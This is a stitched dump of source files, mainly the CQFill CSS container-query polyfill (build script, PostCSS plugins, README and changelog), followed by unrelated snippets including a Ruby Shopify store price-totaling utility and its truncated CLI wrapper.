const variantInfo = variants[variant]
const variantPath = new URL(`${name}.${variantInfo.extension}`, outDirUrl).pathname
const variantCode = variantInfo.transform(lead, customExports[variant] || exports)
const variantMins = (Buffer.byteLength(variantCode) / 1000).toFixed(2)
const variantGzip = Number(zlib.gzipSync(variantCode, { level: 9 }).length / 1000).toFixed(2)
size.types[variant] = {
min: variantMins,
gzp: variantGzip,
}
const mapping = variant === 'iife' ? '' : `\n//# sourceMappingURL=${name}.map`
await fs.writeFile(variantPath, variantCode + mapping)
const packageJSON = JSON.stringify({
private: true,
type: 'module',
main: `${name}.cjs`,
module: `${name}.mjs`,
jsdelivr: `${name}.js`,
unpkg: `${name}.js`,
files: [
`${name}.cjs`,
`${name}.js`,
`${name}.mjs`
],
exports: {
'.': {
browser: `./${name}.js`,
import: `./${name}.mjs`,
require: `./${name}.cjs`,
default: `./${name}.mjs`
}
}
}, null, ' ')
await fs.writeFile(new URL('package.json', outDirUrl), packageJSON)
}
console.log(box(size))
}
}
/** @typedef {{ only?: string[] }} Options */
/** @type {(opts: Options) => Promise<void>} */
export const buildAll = async (opts) => {
const pkgUrl = new URL('../', import.meta.url)
await build(pkgUrl, 'export', opts)
await build(pkgUrl, 'postcss', opts)
await build(pkgUrl, 'postcss-7', opts)
await build(pkgUrl, 'polyfill', opts)
}
if (isProcessMeta(import.meta)) {
if (getProcessArgOf('watch').includes(true)) {
let onlyArgs = getProcessArgOf('only')
onlyArgs = onlyArgs.length ? ['--only', ...onlyArgs] : onlyArgs
nodemon(
[
'-q',
`--watch src`,
`--exec "${['node', './.bin/build.js', ...onlyArgs].join(' ')}"`,
].join(' '),
).on('start', () => {
process.stdout.write('\u001b[3J\u001b[2J\u001b[1J')
console.clear()
}).on('quit', () => process.exit()) // prettier-ignore
} else {
buildAll({
only: getProcessArgOf('only'),
}).catch((error) => {
console.error(error)
process.exitCode = 1
})
}
}
<file_sep>/src/postcss-7.js
import postcssCQFill from './postcss.js'
export default Object.defineProperties(postcssCQFill, Object.getOwnPropertyDescriptors({
get postcss() {
function postcssPlugin(cssRoot) {
const visitors = postcssCQFill()
if (typeof visitors.Once === 'function') {
visitors.Once(cssRoot)
}
cssRoot.walk(node => {
const [visitorType, needle] = {
atrule: ['AtRule', 'name'],
comment: ['Comment', 'text'],
decl: ['Declaration', 'prop'],
rule: ['Rule', 'selector'],
}[node.type]
if (visitorType in visitors) {
const visitor = visitors[visitorType]
if (typeof visitor === 'function') visitor(node)
else if (typeof visitor === 'object' && visitor !== null) {
for (const term in visitor) {
const search = node[needle]
if (term === '*' || term.includes(search)) visitor[term](node)
}
}
}
})
}
postcssPlugin.postcssPlugin = 'cqfill/postcss'
postcssPlugin.postcssVersion = '8.2.13'
return postcssPlugin
}
}))
<file_sep>/src/export.js
export const cqfill = ((
{ every, indexOf, slice } = Array.prototype,
defaultRoot = globalThis.document,
supportsLayoutContainment = defaultRoot && CSS.supports('contain: layout inline-size'),
unmatchableSelector = ':not(*)',
containerQueryMatcher = /\(\s*(min|max)-(height|width):\s*([^\s]+)\s*\)/,
numberMatcher = /^([+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[Ee][+-]?\d+)?)(.*)$/,
/** @type {Set<Element>} */
layoutContainerSet = new Set(),
/** @type {WeakMap<Element, [boolean, boolean]>} */
layoutContainerMap = new WeakMap(),
/** @type {[string, CSSStyleRule, (element: Element, hasInlineSizeContainment: boolean, hasBlockSizeContainment: boolean) => boolean][]} */
containerQueries = [],
/** @type {(() => void)[]} */
onMutationList = [],
/** @type {(selectorList: string[]) => string} */
getSelectorText = (selectorList) => selectorList.length ? `:where(${selectorList.join(',')})` : unmatchableSelector,
/** @type {(element: Element) => string} */
getElementSelectorText = (element) => {
/** @type {Element} */
let parent
let selector = ''
while (parent = element.parentElement) {
/** @type {number} */
const nthChild = indexOf.call(parent.children, element) + 1
selector = ` > :nth-child(${nthChild})${selector}`
element = parent
}
return ':root' + selector
},
/** @type {(element: Element) => boolean} */
hasInlineOuterDisplay = (element) => /inline/i.test(getComputedStyle(element).display),
/** @type {(cssParentRule: CSSParentRule, cssRule: CSSAnyRule) => number} */
getCSSRuleIndexOf = (cssParentRule, cssRule) => indexOf.call(cssParentRule.cssRules || [], cssRule),
/** @type {(cssParentRule: CSSParentRule) => CSSAnyRule[]} */
getCSSRules = (cssParentRule) => slice.call(cssParentRule.cssRules || []),
/** @type {(cssParentRule: CSSParentRule, cssText: string, index: number) => CSSAnyRule} */
insertCssRule = (cssParentRule, cssText, index) => cssParentRule.cssRules[cssParentRule.insertRule(cssText, index)],
onResize = () => {
for (const [containedSelectorText, innerRule, doesFulfillQuery] of containerQueries) {
/** @type {Set<Element>} */
const fulfilledElements = new Set()
for (const layoutContainer of layoutContainerSet) {
if (doesFulfillQuery(layoutContainer, ...layoutContainerMap.get(layoutContainer))) {
for (const element of layoutContainer.querySelectorAll(containedSelectorText)) {
fulfilledElements.add(element)
}
}
}
/** @type {string[]} */
const fulfilledSelectorList = []
for (const element of fulfilledElements) {
const selectorText = getElementSelectorText(element)
fulfilledSelectorList.push(selectorText)
}
const nextSelectorText = fulfilledSelectorList.length ? `:is(${containedSelectorText}):where(${fulfilledSelectorList.join(',')})` : unmatchableSelector
if (innerRule.selectorText !== nextSelectorText) {
innerRule.selectorText = nextSelectorText
}
}
},
/** @type {(root: DocumentOrShadowRoot, cssRule: CSSAnyRule, cssParentRule: CSSParentRule, hasInlineSizeContainment: boolean, hasBlockSizeContainment: boolean) => string} */
addLayoutContainerByCssRule = (root, cssRule, cssParentRule, hasInlineSizeContainment, hasBlockSizeContainment) => {
const cssRuleIndex = getCSSRuleIndexOf(cssParentRule, cssRule)
const getFallbackCssText = (
/** @type {boolean} */
hasInlineDisplay
) => (
`${
unmatchableSelector
}{transform:scale3d(1,1,1);${
hasInlineSizeContainment ? (
`inline-size:${
hasInlineDisplay ? 0 : 100
}%;`
) : ''
}${
hasBlockSizeContainment ? (
`block-size:${
hasInlineDisplay ? 0 : 100
}%;`
) : ''
}}`
)
const fallbackCssText = `@media all{${getFallbackCssText(true)}${getFallbackCssText(false)}}`
const cssPolyfillGroup = insertCssRule(cssParentRule, fallbackCssText, cssRuleIndex)
const [cssInlinePolyfillStyleRule, cssBlockPolyfillStyleRule] = cssPolyfillGroup.cssRules
/** @type {Element[]} */
let lastElements = []
const onMutation = () => {
/** @type {string[]} */
const blockSelectorList = []
/** @type {string[]} */
const inlineSelectorList = []
const elements = root.querySelectorAll(cssRule.selectorText)
/** @type {(value: Element, index: number) => boolean} */
const doesMatchElement = (element, index) => element === lastElements[index]
const doesMatchAllElements = elements.length === lastElements.length && every.call(elements, doesMatchElement)
if (!doesMatchAllElements) {
layoutContainerSet.clear()
ro.disconnect()
for (const element of elements) {
layoutContainerSet.add(element)
layoutContainerMap.set(element, [hasInlineSizeContainment, hasBlockSizeContainment])
const selectorText = getElementSelectorText(element)
if (hasInlineOuterDisplay(element)) inlineSelectorList.push(selectorText)
else blockSelectorList.push(selectorText)
ro.observe(element)
}
const nextInlinePolyfillStyleRuleSelectorText = getSelectorText(inlineSelectorList)
if (cssInlinePolyfillStyleRule.selectorText !== nextInlinePolyfillStyleRuleSelectorText) {
cssInlinePolyfillStyleRule.selectorText = nextInlinePolyfillStyleRuleSelectorText
}
const nextBlockPolyfillStyleRuleSelectorText = getSelectorText(blockSelectorList)
if (cssBlockPolyfillStyleRule.selectorText !== nextBlockPolyfillStyleRuleSelectorText) {
cssBlockPolyfillStyleRule.selectorText = nextBlockPolyfillStyleRuleSelectorText
}
lastElements = elements
}
}
onMutation()
onMutationList.push(onMutation)
mo.observe(root, { attributes: true, childList: true, subtree: true })
},
/** @type {(root: DocumentOrShadowRoot, styleSheet: CSSStyleSheet) => void} */
polyfillLayoutContainment = (root, styleSheet) => {
/** @type {(cssRule: CSSStyleRule) => string[]} */
const getCssStyleRuleContainValues = (cssRule) => cssRule.style ? cssRule.style.getPropertyValue('--css-contain').trim().toLowerCase().split(/\s+/) : []
/** @type {(cssParentRule: CSSParentRule) => void} */
const walkCssParent = (cssParentRule) => {
// For each `CSSRule` in a `CSSGroupingRule` or `CSSStyleSheet`;
for (const cssRule of getCSSRules(cssParentRule)) {
walkCssParent(cssRule)
const containValues = getCssStyleRuleContainValues(cssRule)
const hasLayoutContainment = containValues.includes('layout')
const hasSizeContainment = containValues.includes('size')
const hasInlineSizeContainment = hasLayoutContainment && (hasSizeContainment || containValues.includes('inline-size'))
const hasBlockSizeContainment = hasLayoutContainment && (hasSizeContainment || containValues.includes('block-size'))
// If the target rule represents a style rule, and;
// If the target rule style contains a fallback contain property, and;
// If the fallback contain property represents a layout container, then;
if (hasInlineSizeContainment || hasBlockSizeContainment) {
// Add the element to the list of layout containers, and;
// Add a fallback layout containment rule for that specific element.
addLayoutContainerByCssRule(root, cssRule, cssParentRule, hasInlineSizeContainment, hasBlockSizeContainment)
}
}
}
walkCssParent(styleSheet)
},
/** @type {(root: DocumentOrShadowRoot, styleSheet: CSSStyleSheet) => void} */
polyfillContainerQueries = (root, styleSheet) => {
/** @type {(cssParentRule: CSSParentRule) => void} */
const walkCssParent = (cssParentRule) => {
// For each `CSSRule` in a `CSSGroupingRule` or `CSSStyleSheet`;
for (const cssRule of getCSSRules(cssParentRule)) {
/** @type {string} */
const mediaText = cssRule.media ? cssRule.media.mediaText : ''
const hasContainerQueryPolyfill = mediaText.indexOf('@container') === 0 || mediaText.indexOf('--css-container') === 0
if (hasContainerQueryPolyfill) {
/** @type {null | [string, 'max' | 'min', 'height' | 'width', `${number}${string}`]} */
const containerQueryMatches = cssRule.media[0].match(containerQueryMatcher)
// If the target rule represents a fallback container query;
// Parse the container query from the target rule, and;
if (containerQueryMatches) {
const [, minMax, axis, size] = containerQueryMatches
const [, sizeValue, sizeUnit] = size.match(numberMatcher)
/** @type {(rect: Element, hasInlineSizeContainment: boolean, hasBlockSizeContainment: boolean) => boolean} */
const doesFulfillQuery = (element, hasInlineSizeContainment, hasBlockSizeContainment) => {
const fulfillsBlockSizeContainment = (hasBlockSizeContainment !== (axis === 'block-size' || axis === 'height'))
const fulfillsInlineSizeContainment = (hasInlineSizeContainment !== (axis === 'inline-size' || axis === 'width'))
if (!fulfillsBlockSizeContainment && !fulfillsInlineSizeContainment) return false
const value = element.getBoundingClientRect()[axis]
const sized = Number(sizeValue) * (
sizeUnit === 'em'
? parseInt(window.getComputedStyle(element).fontSize)
: sizeUnit === 'rem'
? parseInt(window.getComputedStyle(root.documentElement).fontSize)
: sizeUnit === 'vh'
? window.innerHeight / 100
: sizeUnit === 'vw'
? window.innerWidth / 100
: 1
)
return (
minMax === 'min'
? value >= sized
: value <= sized
)
}
const cssRuleIndex = getCSSRuleIndexOf(cssParentRule, cssRule)
const cssPolyfillGroup = insertCssRule(cssParentRule, '@media all{}', cssRuleIndex)
let index = 0
for (const cssInnerRule of getCSSRules(cssRule)) {
/** @type {undefined | string} */
const cssInnerRuleSelectorText = cssInnerRule.selectorText
if (cssInnerRuleSelectorText) {
const cssInnerRuleBlock = cssInnerRule.cssText.slice(cssInnerRuleSelectorText.length)
const cssPolyfillInnerRuleCssText = `${unmatchableSelector}${cssInnerRuleBlock}`
/** @type {CSSStyleRule} */
const cssPolyfillInnerRule = insertCssRule(cssPolyfillGroup, cssPolyfillInnerRuleCssText, index++)
containerQueries.push([
cssInnerRuleSelectorText,
cssPolyfillInnerRule,
doesFulfillQuery
])
}
}
}
}
walkCssParent(cssRule)
}
}
walkCssParent(styleSheet)
onResize()
},
/** @type {ResizeObserver} */
ro,
/** @type {MutationObserver} */
mo,
) => (
/** @type {DocumentOrShadowRoot | void} */
root = defaultRoot
) => {
if (defaultRoot && !supportsLayoutContainment) {
let lastNumberOfStyleSheets = 0
/** @type {{ styleSheets: StyleSheetList }} */
const { styleSheets } = root
const onMutation = () => {
for (const onMutation of onMutationList) {
onMutation()
}
}
const onFrame = () => {
const numberOfStyleSheets = styleSheets.length
if (numberOfStyleSheets !== lastNumberOfStyleSheets) {
while (lastNumberOfStyleSheets < numberOfStyleSheets) {
const styleSheet = styleSheets[lastNumberOfStyleSheets++]
if (
styleSheet
&& (
!styleSheet.href
|| styleSheet.href.startsWith(location.origin)
)
) {
polyfillContainerQueries(root, styleSheet)
polyfillLayoutContainment(root, styleSheet)
}
}
lastNumberOfStyleSheets = numberOfStyleSheets
}
requestAnimationFrame(onFrame)
}
ro = new ResizeObserver(onResize)
mo = new MutationObserver(onMutation)
onFrame()
}
}
)()
/** @typedef {CSSStyleRule | CSSImportRule | CSSMediaRule | CSSFontFaceRule | CSSPageRule | CSSNamespaceRule | CSSKeyframesRule | CSSKeyframeRule | CSSSupportsRule} CSSAnyRule */
/** @typedef {CSSStyleSheet | CSSMediaRule | CSSKeyframesRule | CSSSupportsRule} CSSParentRule */
<file_sep>/README.md
# CQFill
**CQFill** is a polyfill for [CSS Container Queries].
```sh
npm install cqfill # yarn add cqfill
```
## Demos
<table><tr><td><a href="https://codepen.io/jonneal/full/rNjRBOX"><img src="https://user-images.githubusercontent.com/188426/116027454-ed950f80-a622-11eb-94f5-be5b9307705b.png" alt="Component Query Card Demo" width="340" /></a></td></tr></table>
<table><tr><td><a href="https://codepen.io/jonneal/full/WNRPBQg"><img src="https://user-images.githubusercontent.com/188426/116027093-f76a4300-a621-11eb-9530-e67727e7fd71.png" alt="Article - QC" width="340" /></a></td></tr></table>
<table><tr><td><a href="https://codepen.io/jonneal/full/YzNBber"><img src="https://user-images.githubusercontent.com/188426/116027091-f6d1ac80-a621-11eb-9c20-2322c1b2a2c8.png" alt="Balloon G-OPAW" width="340" /></a></td></tr></table>
## Usage
Add the **CQFill** polyfill to your page:
```html
<script src="https://unpkg.com/cqfill"></script>
```
Or, add the CQFill script to your NodeJS project:
```js
import 'cqfill'
```
Next, add the included [PostCSS] plugin to your `.postcssrc.json` file:
```json
{
"plugins": [
"cqfill/postcss"
]
}
```
Now, go forth and use CSS container queries:
```css
.container {
contain: layout inline-size;
}
@container (min-width: 700px) {
.contained {
/* styles applied when a container is at least 700px */
}
}
```
## Tips
You can use [PostCSS Nesting] to nest `@container` rules:
```json
{
"plugins": [
"postcss-nesting",
"cqfill/postcss"
]
}
```
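For a rough idea of what that enables, here is a minimal sketch of nested authoring. The class names, breakpoint, and declaration are illustrative only, and the exact un-nested output depends on your postcss-nesting version:
```css
/* Hypothetical component: postcss-nesting un-nests the @container rule,
   then cqfill/postcss adds the --css-contain and @media fallbacks. */
.card {
  contain: layout inline-size;
}
.card__body {
  @container (min-width: 700px) {
    & {
      display: flex;
    }
  }
}
```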
You can activate the polyfill manually:
```html
<script src="https://unpkg.com/cqfill/export"></script>
<script>cqfill() /* cqfill(document); cqfill(shadowRoot) */</script>
```
```js
import { cqfill } from 'cqfill'
cqfill() /* cqfill(document); cqfill(shadowRoot) */
```
## Usage with PostCSS
Use the included PostCSS plugin to process your CSS:
```js
import postcss from 'postcss'
import postcssCQFill from 'cqfill/postcss'
postcss([ postcssCQFill ])
```
To transform CSS with PostCSS and without any other tooling:
```js
import fs from 'fs'
import postcss from 'postcss'
import postcssCQFill from 'cqfill/postcss'
const from = './test/readme.css'
const fromCss = fs.readFileSync(from, 'utf8')
const to = './test/readme.polyfilled.css'
postcss([ postcssCQFill ]).process(fromCss, { from, to }).then(
({ css }) => fs.writeFileSync(to, css)
)
```
## Usage without PostCSS
Add a fallback property to support the CSS [`contain`] property.
```css
/* before */
.container {
contain: layout inline-size;
}
/* after */
.container {
--css-contain: layout inline-size;
contain: layout inline-size;
}
```
Duplicate container queries using a fallback rule.
```css
/* before */
@container (min-width: 700px) {
.contained {
/* styles applied when a container is at least 700px */
}
}
/* after */
@media --css-container and (min-width: 700px) {
.contained {
/* styles applied when a container is at least 700px */
}
}
@container (min-width: 700px) {
.contained {
/* styles applied when a container is at least 700px */
}
}
```
[`contain`]: https://developer.mozilla.org/en-US/docs/Web/CSS/contain
[CSS Container Queries]: https://css.oddbird.net/rwd/query/explainer/
[PostCSS]: https://github.com/postcss/postcss
[PostCSS Nesting]: https://github.com/csstools/postcss-nesting
<file_sep>/CHANGELOG.md
# Changes to CQFill
### 0.6.0 (May 3, 2021)
- Adds support for automatic polyfilling.
- Fixes an issue where container values were case-sensitive.
- Fixes an issue where container queries worked on axes not allowed by `contain`.
- Reduces how often the CSSOM is updated.
### 0.5.0 (April 28, 2021)
- Adds support for non-px query values — `(width >= 25em)`.
- Adds support for external stylesheets from the same origin.
### 0.4.0 (April 26, 2021)
- Adds PostCSS support for the range syntax — `(width >= 700px)`.
### 0.3.1 (April 26, 2021)
- Adds an `"export"` in `package.json` for `"./postcss-7"`.
### 0.3.0 (April 26, 2021)
- Changes the PostCSS plugin to be the default export.
- Adds a PostCSS 7 version of the plugin for increased tooling compatibility.
### 0.2.1 (April 26, 2021)
- Fixes PostCSS usage instructions.
### 0.2.0 (April 26, 2021)
- Adds a PostCSS plugin.
- Prevents the script from throwing in non-DOM environments.
### 0.1.1 (April 25, 2021)
- Fixes the IIFE export.
### 0.1.0 (April 25, 2021)
Initial beta.
<file_sep>/src/polyfill.js
import { cqfill } from './export'
cqfill()
<file_sep>/src/postcss.js
import { transformRanges } from './lib/transformRanges'
function postcssCQFill() {
return {
postcssPlugin: 'PostCSS CQFill',
Declaration: {
contain(
/** @type {PostCSSDeclaration} */
cssDeclaration
) {
cssDeclaration.cloneBefore({
prop: '--css-contain'
})
}
},
AtRule: {
container(
/** @type {PostCSSAtRule} */
cssAtRule
) {
cssAtRule.params = transformRanges(cssAtRule.params)
const clone = cssAtRule.cloneBefore({
name: 'media',
params: `\\@container ${cssAtRule.params}`
})
if (!clone.raws.afterName) clone.raws.afterName = ' '
}
}
}
}
postcssCQFill.postcss = true
export default postcssCQFill
/** @typedef {{ name: string, params: string, cloneBefore(opts: Partial<PostCSSAtRule>): PostCSSAtRule }} PostCSSAtRule */
/** @typedef {{ prop: string, cloneBefore(opts: Partial<PostCSSDeclaration>): PostCSSDeclaration }} PostCSSDeclaration */
|
c2ca57f4e7e8f3d705f68114cc3aee03e4accddc
|
[
"JavaScript",
"Markdown"
] | 8
|
JavaScript
|
teosbb/cqfill
|
7fd175ad52ae19dd95af7da3baffdcbabbb30f70
|
c79fe5fcd570f9b71afc1b10a498b7b8da2ae411
|
refs/heads/master
|
<file_sep>
jvbbh
bkjc
bkjk
fkjlv
kbfkjfbdfkjndknkjdngkjbnbbnngjb n jlfbg
nzgvzhz
njlz
mlz
1234
345
456
gg5
9
0
0
|
5625f2afcd0a95300ec53910c7880e0262cc61ea
|
[
"Python"
] | 1
|
Python
|
matx17/merge
|
9f2ac275c9e3e5061dad6155dcb52f7aaf989737
|
4a2d54cdd20451cc9a002e59b7d52a525c1410e1
|
refs/heads/master
|
<file_sep>export const asArray = ({ benches }) => (
Object.keys(benches).map(key => benches[key])
);<file_sep>class Api::BenchesController < ApplicationController
def index
@benches = bounds ? Bench.in_bounds(bounds) : Bench.all
render :index
end
def create
@bench = Bench.create(bench_params)
render :show
end
private
def bench_params
params.require(:bench).permit(:description, :lat, :lng)
end
def bounds
params[:bounds]
end
end
<file_sep>export const APIUtil = {
signup: user => (
$.ajax({
method: "POST",
url: `/api/users`,
data: { user }
})
),
login: user => (
$.ajax({
method: "POST",
url: '/api/session',
data: { user }
})
),
logout: () => (
$.ajax({
method: "DELETE",
url: `/api/session`
})
)
}<file_sep>import React from "react";
import { Link } from "react-router-dom";
const Greeting = ({ currentUser, logout }) => {
const sessionLinks = () => {
return (
<div className="greeting-links">
<Link className="btn" to="/login">Login</Link>
<Link className="btn" to="/signup">Sign-up</Link>
</div>
)
}
const currentUserGreeting = () => {
return (
<div className="greeting-welcome">
<h3>Welcome {currentUser.username}!</h3>
<a href="/" className="btn" onClick={logout}>Sign out</a>
</div>
)
}
return currentUser ? currentUserGreeting() : sessionLinks()
}
export default Greeting; <file_sep>export const BenchUtil = {
fetchBenches: () => (
$.ajax({
method: "GET",
url: `api/benches`,
error: error => console.log(error)
})
)
}<file_sep>import React from "react";
import BenchMap from "./bench_map";
import BenchIndex from "./bench_index";
export const Search = (props) => (
<section className="section-main">
<BenchMap benches={props.benches}/>
<BenchIndex
benches={props.benches}
fetchBenches={props.fetchBenches} />
</section>
);
|
7f0079a6dfdfc1fe55975cc832c9946b7e98738f
|
[
"JavaScript",
"Ruby"
] | 6
|
JavaScript
|
akhatchatrian/Bench-BnB
|
dfb5b92182e7e74f47b8dd33d6082e2663c80bd8
|
a3cfdd3f0f15fbae0fe9825172b26aec628ae175
|
refs/heads/master
|
<file_sep>"# BlogSpot"
<file_sep>package com.rashmi.rrp.blogspot;
import android.content.Intent;
import android.support.annotation.NonNull;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.text.TextUtils;
import android.view.View;
import android.widget.Button;
import android.widget.EditText;
import android.widget.ProgressBar;
import android.widget.Toast;
import com.google.android.gms.tasks.OnCompleteListener;
import com.google.android.gms.tasks.Task;
import com.google.firebase.auth.AuthResult;
import com.google.firebase.auth.FirebaseAuth;
import com.google.firebase.auth.FirebaseUser;
public class RegisterActivity extends AppCompatActivity {
private EditText regEmail, regPass, regConfirmPass;
private Button regBtn, regLoginBtn;
private ProgressBar regProgress;
FirebaseAuth mAuth;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_register);
mAuth = FirebaseAuth.getInstance();
regEmail = findViewById(R.id.regEmail);
regPass = findViewById(R.id.regPassword);
regConfirmPass = findViewById(R.id.regConfirmPassword);
regBtn = findViewById(R.id.regBtn);
regLoginBtn = findViewById(R.id.regLoginBtn);
regProgress = findViewById(R.id.regProgressBar);
regLoginBtn.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
finish();
}
});
regBtn.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
String email = regEmail.getText().toString();
String pass = regPass.getText().toString();
String confirmPass = regConfirmPass.getText().toString();
if(!TextUtils.isEmpty(email) && !TextUtils.isEmpty(pass) && !TextUtils.isEmpty(confirmPass)) {
if(pass.equals(confirmPass)) {
regProgress.setVisibility(View.VISIBLE);
mAuth.createUserWithEmailAndPassword(email,pass).addOnCompleteListener(new OnCompleteListener<AuthResult>() {
@Override
public void onComplete(@NonNull Task<AuthResult> task) {
if(task.isSuccessful()) {
Intent setupIntent = new Intent(RegisterActivity.this, setupActivity.class);
startActivity(setupIntent);
finish();
} else {
String errorMessage = task.getException().getMessage();
Toast.makeText(RegisterActivity.this, "Error : " +errorMessage, Toast.LENGTH_LONG).show();
}
regProgress.setVisibility(View.INVISIBLE);
}
});
} else {
Toast.makeText(RegisterActivity.this, "Confirm password and password doesn't match", Toast.LENGTH_LONG).show();
}
} else {
Toast.makeText(RegisterActivity.this, "Fill up...", Toast.LENGTH_LONG).show();
}
}
});
}
@Override
protected void onStart() {
super.onStart();
FirebaseUser currentUser = mAuth.getCurrentUser();
if (currentUser != null) {
sendToMain();
}
}
private void sendToMain() {
Intent mainIntent = new Intent(RegisterActivity.this, MainActivity.class);
startActivity(mainIntent);
finish();
}
}
<file_sep>package com.rashmi.rrp.blogspot;
import android.content.Context;
import android.support.annotation.NonNull;
import android.support.v7.widget.RecyclerView;
import android.util.Log;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.TextView;
import com.bumptech.glide.Glide;
import com.bumptech.glide.request.RequestOptions;
import com.google.android.gms.tasks.OnCompleteListener;
import com.google.android.gms.tasks.Task;
import com.google.firebase.auth.FirebaseAuth;
import com.google.firebase.firestore.DocumentSnapshot;
import com.google.firebase.firestore.EventListener;
import com.google.firebase.firestore.FirebaseFirestore;
import com.google.firebase.firestore.FirebaseFirestoreException;
import com.google.firebase.firestore.QuerySnapshot;
import java.util.List;
import javax.annotation.Nullable;
import de.hdodenhof.circleimageview.CircleImageView;
public class CommentsRecyclerAdapter extends RecyclerView.Adapter<CommentsRecyclerAdapter.ViewHolder> {
public List<Comments> commentsList;
public Context context;
public FirebaseFirestore firebaseFirestore;
public CommentsRecyclerAdapter(List<Comments> commentsList) {
this.commentsList = commentsList;
}
@NonNull
@Override
public ViewHolder onCreateViewHolder(@NonNull ViewGroup parent, int viewType) {
View view = LayoutInflater.from(parent.getContext()).inflate(R.layout.comment_list_item, parent, false);
context = parent.getContext();
firebaseFirestore = FirebaseFirestore.getInstance();
return new CommentsRecyclerAdapter.ViewHolder(view);
}
@Override
public void onBindViewHolder(@NonNull final ViewHolder holder, int position) {
holder.setIsRecyclable(false);
String commentMessage = commentsList.get(position).getMessage();
holder.setCommentMessage(commentMessage);
String userId = commentsList.get(position).getUserId();
firebaseFirestore.collection("Users").document(userId).get().addOnCompleteListener(new OnCompleteListener<DocumentSnapshot>() {
@Override
public void onComplete(@NonNull Task<DocumentSnapshot> task) {
if (task.isSuccessful()) {
String userName = task.getResult().getString("name");
String userImage = task.getResult().getString("image");
holder.setUserData(userName, userImage);
} else {
task.getException();
}
}
});
}
@Override
public int getItemCount() {
if (commentsList != null) {
return commentsList.size();
} else {
return 0;
}
}
public class ViewHolder extends RecyclerView.ViewHolder {
private View mView;
private TextView commentMessage;
private CircleImageView commentProfileImage;
private TextView commentUsername;
public ViewHolder(View itemView) {
super(itemView);
mView = itemView;
}
public void setCommentMessage(String message) {
commentMessage = mView.findViewById(R.id.commentMessage);
commentMessage.setText(message);
}
public void setUserData(String userName, String userImage) {
commentProfileImage = mView.findViewById(R.id.commentImage);
commentUsername = mView.findViewById(R.id.commentUsername);
commentUsername.setText(userName);
RequestOptions placeholderOption = new RequestOptions();
placeholderOption.placeholder(R.drawable.avatar);
Glide.with(context).applyDefaultRequestOptions(placeholderOption).load(userImage).into(commentProfileImage);
}
}
}
|
8d078e6f734f0eebcf75ba75b1faab866a1cac8f
|
[
"Markdown",
"Java"
] | 3
|
Markdown
|
Rashmiranjan00/BlogSpot
|
5a58464453ba9bf1c03e5daace9af002b84287d5
|
f96c3077132d32f43ad5e83d105ecf2c4c12cc6a
|
refs/heads/master
|
<file_sep>#!/usr/bin/ruby
require 'net/http'
require 'json'
# A processor used to get information from a Shopify shop.
class StoreProcessor
# Create a URI from String and test it. Either operation could
# throw an exception. If either fails, catch their exception
# and focus them into a InitializationError
def initialize(store_string)
puts "Trying to create URI on \"#{store_string}\""
@product_uri = build_product_uri(store_string)
puts "Testing connectivity to \"#{@product_uri}\"..."
fetch_products(@product_uri)
rescue StandardError => error # Focus the exceptions
raise InitializationError, error.message
end
# Print a list of available types in the store
def print_types
list = list_types
puts 'The available types are:'
puts list
end
# Find the total cost to purchase all items of given types
def get_filtered_total(item_types)
puts "Getting total for item types #{item_types} from \"#{@product_uri}\""
total = 0
products_of_each_page do |products|
filtered_products = filter_products(products, item_types)
print_all_prices(filtered_products)
filtered_variants_prices = all_variant_prices(filtered_products)
total += filtered_variants_prices.reduce(0, :+)
end
# Some extra formatting to make sure we get exactly two decimals
puts "TOTAL: $#{format('%.2f', total)}"
total
end
private
# Build a product URI from a string describing a Shopify store
def build_product_uri(uri_string)
product_uri = URI(uri_string)
product_uri.path = '/products.json'
if product_uri.host.nil?
raise URI::InvalidURIError, "Couldn't create a URI with a valid host!"
end
product_uri
end
# Get a list of products
def fetch_products(product_uri)
response = Net::HTTP.get_response(product_uri)
response.value # Throws an exception if the response code is not 2xx
JSON.parse(response.body)['products']
end
# Get a list of filtered products
def filter_products(products, item_types)
products.select do |product|
item_types.any? do |type|
product['product_type'].downcase.include? type.downcase
end
end
end
# Get a list of prices for each variant of every product from a product list
def all_variant_prices(products)
products.flat_map do |product|
product['variants'].map do |variant|
variant['price'].to_f
end
end
end
# Prints all variants of a product list with their prices
def print_all_prices(products)
products.each do |product|
puts product['title']
product['variants'].each do |variant|
puts " #{variant['title']} -> $#{variant['price']}"
end
end
end
# Run the content of a block and handle errors it may raise
def with_error_handling
yield
rescue StandardError => error
puts "#{__method__}: #{error.message}"
puts "#{__method__} backtrace:"
puts error.backtrace
nil
end
# Go through each store page
def each_page
# We pick a large range of page numbers. This could be done better
# if we were able to determine the number of pages before iterating
(1..9_999_999).each do |page_number|
yield page_number
end
end
# Go through the products of each page
def products_of_each_page
each_page do |page_number|
# Make a copy as URI requires we modify the object to handle
# different queries
page_product_uri = @product_uri.dup
# Build a URI for the page number
page_product_uri.query = URI.encode_www_form(page: page_number)
products = with_error_handling do
puts "Checking products on page #{page_number}"
fetch_products(page_product_uri)
end
break if products.nil?
break if products.empty?
yield products
end
end
# Gets the types available in the store
def list_types
puts "Getting available shop types from \"#{@product_uri}\""
types = []
products_of_each_page do |products|
types += products.map { |product| product['product_type'] }
end
types.uniq
end
end
# An error used during initialization
class InitializationError < StandardError; end
<file_sep>#!/usr/bin/ruby
# Quick script to run our StoreProcessor in a CLI util!
require 'optparse'
require 'ostruct'
require_relative 'StoreProcessor'
# Help if run without options
ARGV << '-h' if ARGV.empty?
options = OpenStruct.new
options.types = Array.new
OptionParser.new do |opts|
opts.banner =
"This is a small util used to get info on Shopify stores. \n" +
"With this, you can: \n" +
" 1. Get a list of the various types of items of a store. \n" +
" e.g. #{File.basename(__FILE__)} --store 'http://shopicruit.myshopify.com' \n" +
" 2. Search a store for all items of given types! \n" +
" e.g. #{File.basename(__FILE__)} --store 'http://shopicruit.myshopify.com' --types 'watch,clock'"
opts.separator ""
opts.separator "Usage: #{File.basename(__FILE__)} [options]"
opts.separator ""
opts.separator "Specific options:"
opts.on("-s", "--store STORE_URI", String, "URI to a Shopify store. Be sure to include the protocol!") do |store_uri|
options.store_uri = store_uri
end
opts.on("-t", "--types x,y,z", Array, "Comma separated list of item types.") do |types|
options.types.push(*types)
end
